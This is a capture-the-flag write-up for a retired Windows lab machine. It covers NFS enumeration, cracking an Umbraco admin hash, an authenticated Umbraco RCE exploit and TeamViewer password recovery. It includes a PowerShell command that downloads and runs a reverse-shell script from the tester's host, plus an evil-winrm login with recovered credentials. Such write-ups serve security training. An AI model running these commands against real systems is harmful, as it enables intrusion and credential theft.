Remote machine is a vulnerable machine with Windows operating system among retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic scan
Full Port Scan
As a result of port scanning, we found that 21/tcp ftp Microsoft ftpd (Anonymous FTP login allowed), 80/tcp http Microsoft HTTPAPI httpd 2.0, 111/tcp rpcbind, 111/tcp6 rpcbind, 135/tcp msrpc Microsoft Windows RPC, 139/tcp netbios-ssn Microsoft Windows netbios-ssn, 445/tcp microsoft-ds, 2049/tcp mountd ports are open.
We provide enumeration over these ports in order
FTP is open and allows anonymous access. I connected, but the root is empty. I also tested writing but no permission.
Typical checks on SMB showed no access to any share:
NFS enumeration
NFS is very rare on HTB machines and so having it turned on is definitely worth some attention. showmount will give the paths that can be mounted and who can mount them.
showmount -e 10.10.10.10.180
mount -t nfs 10.10.10.10.180:/site_backups /tmp/nfs
We mount it to the tmp/nfs folder using the commands. Then we provide enumeration here. Here we looked at all folders
We saw the credentail information in the App_Data/Umbraco.sdf file.
.sdf files are standard database format files
Credential information is hashed, let’s try to break it
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{“hashAlgorithm”:”SHA1″}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={“hashAlgorithm”:”HMACSHA256″}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
and try to crack the hash.
I broke hashi with John
appeared as baconandcheese
After that we go to the enumeration section on port 80.
We came across Umbraco HQ, this ready-made CMS, let’s do a gobuster scan on it
Here we encountered directories, when we went to the /umbraco directory, it directed us to the login page, where we use the credential information we obtained.
admin@htb.local : baconandcheese
We were able to successfully log in
We provide enumeration through the interface
Let’s see if there is a vulnerability with this version
We encountered a lot of vulnerabilities here.
RCE vulnerabilities are always important for us, we download this and run it
As seen here
Command executed we ran whoami and got the command output. We understand that there is a vulnerability here.
Here we send Invoke-PowerShellTcp.ps1 to the other side and run it
python 49488.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180/ -c ‘cmd.exe’ -a “/c powershell -c iex(new-object net.webclient).downloadstring(‘http://10.10.14.19:8000/Invoke-PowerShellTcp.ps1’)”
In 1 we offer web service from python so that in 2 we work our command and in 3 we get shelli
We obtained the user flag from the Shell we obtained, but we could not obtain the root flag
Since we got permission denied, we provide local enumeration here.
We used commands such as systeminfo whoami /priv and then we displayed the running likes with tasklist
We see that TeamViewer_Service.exe is running. Let’s check which version of Teamviwer is running and then search for exploits related to it
We saw that it was Version 7
We ran the code on github but I couldn’t decode it
After a little more research, I realized that it also exists on metasploit, here we will have to use msfconsole, first let’s get msfvenom to generate a revershell for us, then install it on this malicious machine and listen with multi handler on msfconsole.
Then we digip and set Show options from msfconsole
We say run and wait and go and upload the payload we created to the target machine.
After running it we got shell from meterreter
Now let’s search for teamviwer
We ran the password genrete we found
We obtained the password !R3m0te! We try this from the admin user
evil-winrm -i 10.10.10.10.180 -u administrator -p ‘!R3m0te!’
This is how we got the root flag.